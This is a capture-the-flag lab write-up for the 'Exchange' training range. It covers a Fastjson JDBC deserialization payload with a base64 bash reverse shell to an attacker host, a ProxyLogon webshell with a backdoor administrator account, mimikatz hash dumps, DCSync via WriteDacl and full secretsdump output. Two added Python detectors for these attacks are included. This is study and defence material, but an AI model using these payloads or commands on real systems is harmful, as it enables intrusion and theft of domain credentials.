春秋云镜 (Chunqiu Yunjing) - Exchange

This post was last updated on the evening of 14 September 2025.

Fastjson + JDBC, Exchange service, Microsoft Exchange ProxyLogon exploitation, WriteDacl permission, pass-the-hash attack

Information gathering

fscan

D:\aWeb\fscan-main>.\fscan.exe -h 39.98.107.181

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
39.98.107.181:80 open
39.98.107.181:22 open
39.98.107.181:8000 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.98.107.181 code:200 len:219 title:None
[*] WebTitle http://39.98.107.181:8000 code:302 len:0 title:None 跳转url: http://39.98.107.181:8000/login.html
[*] WebTitle http://39.98.107.181:8000/login.html code:200 len:5662 title:Lumia ERP
已完成 3/3
[*] 扫描结束,耗时: 50.5764704s

Fastjson + JDBC exploitation

There is a web application: the Lumia ERP login page. The weak credential admin:123456 logs in.

Clicking "官方插件" (official plugins) redirects to a site whose domain has expired:

http://www.huaxiaerp.com/forum-43-1.html

A search shows this is 华夏 ERP, which has a Fastjson vulnerability at /user/list?search=. Test payload:

{"@type":"java.net.Inet4Address","val":"test.ot5kfv.dnslog.cn"}

The PoC is as follows:

/user/list?search=%7b%22%40%74%79%70%65%22%3a%22%6a%61%76%61%2e%6e%65%74%2e%49%6e%65%74%34%41%64%64%72%65%73%73%22%2c%22%76%61%6c%22%3a%22%62%75%74%74%33%72%66%31%79%2e%73%74%6a%32%33%61%2e%64%6e%73%6c%6f%67%2e%63%6e%22%7d%0a

The DNSLog test succeeds, so the vulnerability is exploitable.

Next, go after the JDBC chain (JDBC4Connection). Reference: 手把手带你深入分析 Fastjson JDBC 调用链利用过程 (a step-by-step analysis of the Fastjson JDBC call chain), 先知社区.

Start the evil-mysql-server:

./evil-mysql-server -addr 3306 -java java -ysoserial ysoserial-all.jar 

URL-encode the following payload and send it to get a reverse shell:

{
"name": {
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.jdbc.JDBC4Connection",
"hostToConnectTo": "vpsIP地址",
"portToConnectTo": 3306,
"info": {
"user": "yso_CommonsCollections6_bash -c {echo,base64编码后的命令}|{base64,-d}|{bash,-i}",
"password": "pass",
"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"NUM_HOSTS": "1"
}
}

flag01: flag{846e59ef-3802-4db5-bd3e-e004d70c0af4}
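From the defender's side, both requests above leave a clear trace in the web server's access log: a percent-encoded JSON object carrying the Fastjson `@type` key, and for the JDBC chain the `JDBC4Connection` class name plus the `autoDeserialize` and `statementInterceptors` connection properties. The following is an added example, not code from the original post or from the ERP project: a small Python detector that decodes the request target of each log line (including double-encoded values) and reports which of these indicators it contains. The log lines, the regular expression for the combined log format, and the IP addresses are constructed for the example; the encoded probe is the PoC from the writeup.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, quote, unquote, urlsplit

AUTOTYPE_KEY = "@type"

# Class names and connection properties that make up the autoType probe and the
# MySQL JDBC deserialization chain shown in the writeup above.
GADGET_MARKERS = {
    "java.net.Inet4Address": "DNS-resolving autoType probe",
    "java.lang.AutoCloseable": "AutoCloseable autoType bypass",
    "com.mysql.jdbc.JDBC4Connection": "MySQL JDBC connection gadget",
    "autoDeserialize": "JDBC autoDeserialize connection property",
    "ServerStatusDiffInterceptor": "JDBC statement interceptor trigger",
}

# Combined-format access log line (constructed layout); the request target is inspected.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def fully_unquote(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(target: str) -> List[str]:
    """Return the Fastjson/JDBC indicators present in one request target (path + query)."""
    parts = urlsplit(target)
    candidates = [fully_unquote(parts.path)]
    for values in parse_qs(parts.query, keep_blank_values=True).values():
        candidates.extend(fully_unquote(v) for v in values)

    findings: List[str] = []
    for text in candidates:
        if AUTOTYPE_KEY in text:
            findings.append("Fastjson @type autoType key")
        for marker, label in GADGET_MARKERS.items():
            if marker in text:
                findings.append(label)
    return list(dict.fromkeys(findings))  # de-duplicate, keep order


def scan_access_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run inspect_request over log lines and return one alert per suspicious request."""
    alerts: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = inspect_request(m.group("target"))
        if hits:
            alerts.append({"ip": m.group("ip"), "time": m.group("ts"),
                           "target": m.group("target"), "indicators": hits})
    return alerts


# --- constructed sample input ------------------------------------------------
# POC_TARGET is the DNSLog probe from the writeup. JDBC_PAYLOAD mirrors the JDBC
# JSON from the writeup with placeholder host and gadget values, kept as a raw
# string because Fastjson relies on the duplicated "@type" key.
POC_TARGET = ("/user/list?search=%7b%22%40%74%79%70%65%22%3a%22%6a%61%76%61%2e%6e%65%74"
              "%2e%49%6e%65%74%34%41%64%64%72%65%73%73%22%2c%22%76%61%6c%22%3a%22%62%75"
              "%74%74%33%72%66%31%79%2e%73%74%6a%32%33%61%2e%64%6e%73%6c%6f%67%2e%63%6e%22%7d%0a")
JDBC_PAYLOAD = (
    '{"name":{"@type":"java.lang.AutoCloseable","@type":"com.mysql.jdbc.JDBC4Connection",'
    '"hostToConnectTo":"ATTACKER_HOST_PLACEHOLDER","portToConnectTo":3306,'
    '"info":{"user":"yso_PLACEHOLDER","password":"pass",'
    '"statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",'
    '"autoDeserialize":"true","NUM_HOSTS":"1"}}}'
)
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Sep/2025:17:30:01 +0800] "GET /user/list?search=zhang HTTP/1.1" 200 219',
    f'10.0.0.9 - - [07/Sep/2025:17:30:07 +0800] "GET {POC_TARGET} HTTP/1.1" 200 219',
    f'10.0.0.9 - - [07/Sep/2025:17:30:40 +0800] "GET /user/list?search={quote(JDBC_PAYLOAD)} HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert["ip"], alert["time"], alert["indicators"])
```

The benign search for `zhang` produces nothing, the DNSLog probe is flagged for the `@type` key and the `Inet4Address` class, and the JDBC request is flagged on all four chain markers. In production the same check belongs in a WAF rule or a SIEM parser; the point is that the `@type` key in user-supplied JSON is almost never legitimate and is cheap to alert on, and that upgrading Fastjson or disabling autoType removes the root cause.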

Internal network reconnaissance

Check the local IP: 172.22.3.12

# ifconfig
eth0 Link encap:Ethernet HWaddr 00:16:3e:2b:7f:46
inet addr:172.22.3.12 Bcast:172.22.255.255 Mask:255.255.0.0
inet6 addr: fe80::216:3eff:fe2b:7f46/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:174430 errors:0 dropped:0 overruns:0 frame:0
TX packets:52652 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:212622994 (212.6 MB) TX bytes:27000176 (27.0 MB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:10258 errors:0 dropped:0 overruns:0 frame:0
TX packets:10258 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:2732393 (2.7 MB) TX bytes:2732393 (2.7 MB)

Scan the internal network with fscan:

# ./FScan_2.0.1_linux_x64 -h 172.22.3.12/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1

[1.9s] 已选择服务扫描模式
[1.9s] 开始信息扫描
[1.9s] CIDR范围: 172.22.3.0-172.22.3.255
[1.9s] generate_ip_range_full
[1.9s] 解析CIDR 172.22.3.12/24 -> IP范围 172.22.3.0-172.22.3.255
[1.9s] 最终有效主机数量: 256
[1.9s] 开始主机扫描
[1.9s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.9s] [*] 目标 172.22.3.12 存活 (ICMP)
[1.9s] [*] 目标 172.22.3.2 存活 (ICMP)
[1.9s] [*] 目标 172.22.3.26 存活 (ICMP)
[1.9s] [*] 目标 172.22.3.9 存活 (ICMP)
[4.9s] 存活主机数量: 4
[4.9s] 有效端口数量: 233
[4.9s] [*] 端口开放 172.22.3.12:80
[4.9s] [*] 端口开放 172.22.3.12:22
[4.9s] [*] 端口开放 172.22.3.26:139
[4.9s] [*] 端口开放 172.22.3.26:135
[5.0s] [*] 端口开放 172.22.3.12:8000
[5.0s] [*] 端口开放 172.22.3.26:445
[5.0s] [*] 端口开放 172.22.3.2:135
[5.0s] [*] 端口开放 172.22.3.2:445
[5.0s] [*] 端口开放 172.22.3.2:389
[5.0s] [*] 端口开放 172.22.3.2:139
[5.0s] [*] 端口开放 172.22.3.2:88
[5.0s] [*] 端口开放 172.22.3.9:808
[5.0s] [*] 端口开放 172.22.3.9:443
[5.0s] [*] 端口开放 172.22.3.9:139
[5.0s] [*] 端口开放 172.22.3.9:445
[5.0s] [*] 端口开放 172.22.3.9:135
[5.0s] [*] 端口开放 172.22.3.9:81
[5.0s] [*] 端口开放 172.22.3.9:80
[5.0s] [*] 端口开放 172.22.3.9:8172
[6.0s] 扫描完成, 发现 19 个开放端口
[6.0s] 存活端口数量: 19
[6.0s] 开始漏洞扫描
[6.1s] [*] 网站标题 http://172.22.3.12 状态码:200 长度:19813 标题:lumia
[6.1s] POC加载完成: 总共387个,成功387个,失败0
[6.1s] [*] NetInfo 扫描结果
目标主机: 172.22.3.26
主机名: XIAORANG-PC
发现的网络接口:
IPv4地址:
└─ 172.22.3.26
[6.1s] [*] NetInfo 扫描结果
目标主机: 172.22.3.9
主机名: XIAORANG-EXC01
发现的网络接口:
IPv4地址:
└─ 172.22.3.9
[6.1s] [*] NetInfo 扫描结果
目标主机: 172.22.3.2
主机名: XIAORANG-WIN16
发现的网络接口:
IPv4地址:
└─ 172.22.3.2
[6.1s] [+] NetBios 172.22.3.2 DC:XIAORANG-WIN16.xiaorang.lab Windows Server 2016 Datacenter 14393
[6.2s] [+] NetBios 172.22.3.26 XIAORANG\XIAORANG-PC
[6.2s] [+] NetBios 172.22.3.9 XIAORANG-EXC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[6.2s] 系统信息 172.22.3.2 [Windows Server 2016 Datacenter 14393]
[6.4s] [*] 网站标题 http://172.22.3.12:8000 状态码:302 长度:0 标题:无标题 重定向地址: http://172.22.3.12:8000/login.html
[6.5s] [*] 网站标题 http://172.22.3.9:81 状态码:403 长度:1157 标题:403 - 禁止访问: 访问被拒绝。
[6.6s] [*] 网站标题 http://172.22.3.12:8000/login.html 状态码:200 长度:5662 标题:Lumia ERP
[7.4s] [*] 网站标题 http://172.22.3.9 状态码:403 长度:0 标题:无标题
[7.8s] [*] 网站标题 https://172.22.3.9 状态码:302 长度:0 标题:无标题 重定向地址: https://172.22.3.9/owa/
[8.5s] [*] 网站标题 https://172.22.3.9/owa/ 状态码:200 长度:28237 标题:Outlook
[10.0s] [*] 网站标题 https://172.22.3.9:8172 状态码:404 长度:0 标题:无标题
[1m51s] 扫描已完成: 36/36

This gives the following information:

172.22.3.12   this host (web server)
172.22.3.2    DC: XIAORANG-WIN16.xiaorang.lab, Windows Server 2016, domain controller
172.22.3.26   XIAORANG\XIAORANG-PC
172.22.3.9    XIAORANG-EXC01.xiaorang.lab, Windows Server 2016

It also shows that 172.22.3.9 runs Outlook (OWA).

Microsoft Exchange ProxyLogon exploitation

The Exchange mailbox needs an account and password to log in, so try ProxyLogon to get a shell and add a backdoor account:

└─# proxychains -q python2 proxylogon.py 172.22.3.9 administrator@xiaorang.lab

_____ _
| __ \ | |
| |__) | __ _____ ___ _| | ___ __ _ ___ _ __
| ___/ '__/ _ \ \/ / | | | | / _ \ / _` |/ _ \| '_ \
| | | | | (_) > <| |_| | |___| (_) | (_| | (_) | | | |
|_| |_| \___/_/\_ \__, |______\___/ \__, |\___/|_| |_|
__/ | __/ |
|___/ |___/

Original PoC by https://github.com/testanull
Author: @Haus3c


Target: 172.22.3.9
=============================
[+] Attempting SSRF
DN: /o=XIAORANG LAB/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=8ca6ff254802459d9f63ee916eabb487-Administrat
SID: S-1-5-21-533686307-2117412543-4200729784-500
[+] SSRF Successful!
[+] Attempting Arbitrary File Write
SessionID: 23b19d1f-c638-4d75-83d0-74d85b8d356d
CanaryToken: GkMzES3LNUi6llExSnZZ6_LKm-x5790IJH9pqaX_2gYs0WxfcWZBqRKicw80OlhHtZ9z4N1IQMI.
OABId: 6d8fb74b-8477-43ee-83ba-0b119205e85f
[+] Success! Entering webshell. Type 'quit' or 'exit' to escape.

# whoami
nt authority\system

# net user butt3rf1y butt3r_f1y! /add

# net localgroup administrators butt3rf1y /add

Log in over RDP and grab the flag:

flag02: flag{70a3a53a-dc66-45bb-a7d0-75edf74d006d}

DCSync via WriteDacl permission

Task Manager shows another user is logged on.

Dump the hashes with mimikatz: we get the hashes of the domain user Zhangtong and of the machine account XIAORANG-EXC01$:

Authentication Id : 0 ; 2025799 (00000000:001ee947)
Session : RemoteInteractive from 2
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2025/9/7 14:32:28
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 1867480 (00000000:001c7ed8)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/9/7 14:32:22
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : bc2aaa56d33a9080b44fbe2d44b520b5
* SHA1 : 67ae100419abf0f216f927571cb12ee55c209132
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : b5 92 7e 8c bd 05 90 45 5d c3 d4 ee 2f bf a3 04 65 8b 06 f6 b5 48 52 7f a9 33 12 87 a8 f5 94 38 90 13 b1 5d ab f0 73 63 81 79 8e 7d d9 08 02 1d ba 7f f8 b9 a5 97 23 97 3c 9c 1d b0 a8 89 b7 48 ba 52 10 1d e7 80 cb a4 fd 9e 2a db 5a cd 40 ae 2a c7 5d 00 fb 6d c5 41 a0 a7 17 c3 4c 5f e4 3e f0 5a 10 a9 8e f0 97 24 f9 69 56 bf ed 2b 54 34 5b 65 6d af 96 15 cb 4d b9 6a b9 5b 42 2e a3 7d df e6 1c 9b 28 ca 04 82 4a 80 f2 5d a9 72 2b 6f e0 21 f7 c0 d8 11 8f f0 6d 15 98 10 48 d6 6c f8 e7 e9 92 36 9e 1e 9c e2 e7 dc a5 f4 fe a8 ed 4b 1d 7a 5d 8f 55 f5 1e 45 58 ce 30 cc 09 49 b3 b8 09 b8 3a fe 27 1f 10 74 7d 4e 73 c4 af db 39 94 a5 c6 2b e3 22 2f 04 b7 9b 75 f0 72 ac b5 6f 21 d0 3c cb 82 0f 49 76 c4 83 bf df db 0f 3f 2e 57
ssp :
credman :

Dump the domain information for analysis:

proxychains -q bloodhound-python -d xiaorang.lab -u 'Zhangtong' --hashes 22c7f81993e96ac83ac2f3f1903de8b4:22c7f81993e96ac83ac2f3f1903de8b4 -dc XIAORANG-WIN16.xiaorang.lab -c all -ns 172.22.3.2 --zip --dns-tcp

BloodHound shows that the machine account of the web host, XIAORANG-EXC01$, has WriteDacl.

So we go for DCSync:

└─# proxychains -q impacket-dacledit 'XIAORANG.LAB'/'XIAORANG-EXC01$' -hashes bc2aaa56d33a9080b44fbe2d44b520b5:bc2aaa56d33a9080b44fbe2d44b520b5 -action write -rights DCSync -principal 'XIAORANG-EXC01$' -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2
/usr/share/doc/python3-impacket/examples/dacledit.py:101: SyntaxWarning: invalid escape sequence '\V'
'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/dacledit.py:110: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:111: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:112: SyntaxWarning: invalid escape sequence '\I'
'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/dacledit.py:114: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:115: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:116: SyntaxWarning: invalid escape sequence '\W'
'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/dacledit.py:117: SyntaxWarning: invalid escape sequence '\T'
'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:118: SyntaxWarning: invalid escape sequence '\D'
'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:119: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:120: SyntaxWarning: invalid escape sequence '\E'
'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/dacledit.py:121: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:122: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:123: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:124: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:125: SyntaxWarning: invalid escape sequence '\H'
'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/dacledit.py:126: SyntaxWarning: invalid escape sequence '\A'
'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:127: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20250907-171134.bak
[*] DACL modified successfully!
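The two steps above each generate a distinct Windows Security event on the domain controller when auditing is enabled: the dacledit write shows up as event 5136 (directory service object modified) with `nTSecurityDescriptor` as the changed attribute on the domain head, and the later replication request shows up as event 4662 whose `Properties` field lists the DS-Replication-Get-Changes control-access-right GUIDs. The following is an added example, not code from the original post or from Impacket: a Python triage routine that flags 4662 replication requests from any account that is not a known domain controller, and any 5136 security-descriptor write. The event dicts are constructed for the example (field names follow the Windows Security log schema, values use this range's names); a real deployment would feed it parsed EVTX or SIEM records.

```python
from typing import Dict, List

# Control-access-right GUIDs that a replication (DCSync) request presents.
# These are the documented Active Directory extended-right values.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

Event = Dict[str, object]


def is_domain_controller(account: str, domain_controllers: List[str]) -> bool:
    """Computer accounts end in '$'; compare the bare host name against the DC list."""
    return account.rstrip("$").upper() in {dc.upper() for dc in domain_controllers}


def check_event(event: Event, domain_controllers: List[str]) -> List[str]:
    """Return alert strings for one security event (empty list when benign)."""
    alerts: List[str] = []
    event_id = event.get("EventID")
    subject = str(event.get("SubjectUserName", ""))

    if event_id == 4662:
        # 4662 lists the requested control-access rights as GUIDs in 'Properties'.
        props = str(event.get("Properties", "")).lower()
        rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
        if rights and not is_domain_controller(subject, domain_controllers):
            alerts.append(f"possible DCSync: {subject} requested {', '.join(rights)}")

    if event_id == 5136 and event.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor":
        # A security-descriptor write on the domain object is how DCSync rights get granted.
        alerts.append(f"DACL modified on {event.get('ObjectDN')} by {subject}")

    return alerts


def triage(events: List[Event], domain_controllers: List[str]) -> List[str]:
    """Run check_event over a batch of events and collect every alert."""
    out: List[str] = []
    for event in events:
        out.extend(check_event(event, domain_controllers))
    return out


# --- constructed sample events (not real logs) --------------------------------
DOMAIN_CONTROLLERS = ["XIAORANG-WIN16"]
SAMPLE_EVENTS: List[Event] = [
    {   # DACL write on the domain object by the Exchange machine account
        "EventID": 5136, "SubjectUserName": "XIAORANG-EXC01$",
        "ObjectDN": "DC=xiaorang,DC=lab", "AttributeLDAPDisplayName": "nTSecurityDescriptor",
    },
    {   # replication request from the same non-DC account: DCSync
        "EventID": 4662, "SubjectUserName": "XIAORANG-EXC01$",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # the same right requested by the DC itself: expected replication traffic
        "EventID": 4662, "SubjectUserName": "XIAORANG-WIN16$",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # an ordinary 4662 for an unrelated right (User-Force-Change-Password)
        "EventID": 4662, "SubjectUserName": "Zhangtong",
        "Properties": "{00299570-246d-11d0-a768-00aa006e0529}",
    },
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS, DOMAIN_CONTROLLERS):
        print(line)
```

Only the first two events fire: the DC's own replication traffic and the unrelated right are ignored. The allowlist is the important design choice, because replication rights are legitimately exercised by every DC and by some backup or identity-sync products, so the rule needs a maintained list of those principals rather than a blanket match on the GUIDs. A 5136 on the domain head that adds these rights to anything that is not a DC should be treated as an incident on its own, since, as this range shows, the replication request follows within minutes.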

Then dump every hash in the domain directly:

└─# proxychains -q impacket-secretsdump 'XIAORANG.LAB'/'XIAORANG-EXC01$'@172.22.3.2 -hashes bc2aaa56d33a9080b44fbe2d44b520b5:bc2aaa56d33a9080b44fbe2d44b520b5
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
xiaorang.lab\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7acbc09a6c0efd81bfa7d5a1d4238beb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b8fa79a52e918cb0cbcd1c0ede492647:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\$431000-7AGO1IPPEUGJ:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_46bc0bcd781047eba:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2554056e362e45ba9:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_ae8e35b0ca3e41718:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_341e33a8ba4d46c19:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_3d52038e2394452f8:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2ddd7a0d26c84e7cb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_015b052ab8324b3fa:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_9bd6f16aa25343e68:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_68af2c4169b54d459:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\HealthMailbox8446c5b:1135:aad3b435b51404eeaad3b435b51404ee:00d8a86839e3a99044a6bd793102dc31:::
xiaorang.lab\HealthMailbox0d5918e:1136:aad3b435b51404eeaad3b435b51404ee:f6eef9918e591ca09c721976db49a5d4:::
xiaorang.lab\HealthMailboxeda7a84:1137:aad3b435b51404eeaad3b435b51404ee:1e89e23e265bb7b54dc87938b1b1a131:::
xiaorang.lab\HealthMailbox33b01cf:1138:aad3b435b51404eeaad3b435b51404ee:0eff3de35019c2ee10b68f48941ac50d:::
xiaorang.lab\HealthMailbox9570292:1139:aad3b435b51404eeaad3b435b51404ee:e434c7db0f0a09de83f3d7df25ec2d2f:::
xiaorang.lab\HealthMailbox3479a75:1140:aad3b435b51404eeaad3b435b51404ee:c43965ecaa92be22c918e2604e7fbea0:::
xiaorang.lab\HealthMailbox2d45c5b:1141:aad3b435b51404eeaad3b435b51404ee:4822b67394d6d93980f8e681c452be21:::
xiaorang.lab\HealthMailboxec2d542:1142:aad3b435b51404eeaad3b435b51404ee:147734fa059848c67553dc663782e899:::
xiaorang.lab\HealthMailboxf5f7dbd:1143:aad3b435b51404eeaad3b435b51404ee:e7e4f69b43b92fb37d8e9b20848e6b66:::
xiaorang.lab\HealthMailbox67dc103:1144:aad3b435b51404eeaad3b435b51404ee:4fe68d094e3e797cfc4097e5cca772eb:::
xiaorang.lab\HealthMailbox320fc73:1145:aad3b435b51404eeaad3b435b51404ee:0c3d5e9fa0b8e7a830fcf5acaebe2102:::
xiaorang.lab\Lumia:1146:aad3b435b51404eeaad3b435b51404ee:862976f8b23c13529c2fb1428e710296:::
Zhangtong:1147:aad3b435b51404eeaad3b435b51404ee:22c7f81993e96ac83ac2f3f1903de8b4:::
XIAORANG-WIN16$:1000:aad3b435b51404eeaad3b435b51404ee:9b7e332d6adcb4d62cae212d0c8038b8:::
XIAORANG-EXC01$:1103:aad3b435b51404eeaad3b435b51404ee:bc2aaa56d33a9080b44fbe2d44b520b5:::
XIAORANG-PC$:1104:aad3b435b51404eeaad3b435b51404ee:6e136574f98f5d76aa1d5557e71b2edd:::
[*] Kerberos keys grabbed
xiaorang.lab\Administrator:aes256-cts-hmac-sha1-96:d35b5e1dedca8060e674610041c5095c853724ca50c986c909a955b15fadf630
xiaorang.lab\Administrator:aes128-cts-hmac-sha1-96:8b17084cfa8d1c1d37c13201d68ec0cf
xiaorang.lab\Administrator:des-cbc-md5:d9c4a4d5348f0d73
krbtgt:aes256-cts-hmac-sha1-96:951d91f55df01d8e3013f433c695fd9684ac2f9f5c08fa815f751c894ca749f9
krbtgt:aes128-cts-hmac-sha1-96:7aa1c6c1f4080fdbf150cf5b6385c480
krbtgt:des-cbc-md5:700d434046231a9e
xiaorang.lab\HealthMailbox8446c5b:aes256-cts-hmac-sha1-96:e34d601b6af9400b61602b8c9f71686f0393a97168db256adda27558816c4112
xiaorang.lab\HealthMailbox8446c5b:aes128-cts-hmac-sha1-96:34f030ea99be5779376807998952ee81
xiaorang.lab\HealthMailbox8446c5b:des-cbc-md5:4675ef8c15862329
xiaorang.lab\HealthMailbox0d5918e:aes256-cts-hmac-sha1-96:dc5bb8f5cebfb09275e74f1fbb80a7eae044a064202a5b291aa09700909cabb5
xiaorang.lab\HealthMailbox0d5918e:aes128-cts-hmac-sha1-96:fa2569ff74ac4ef0145b684535b9db26
xiaorang.lab\HealthMailbox0d5918e:des-cbc-md5:b05ed989c78304fb
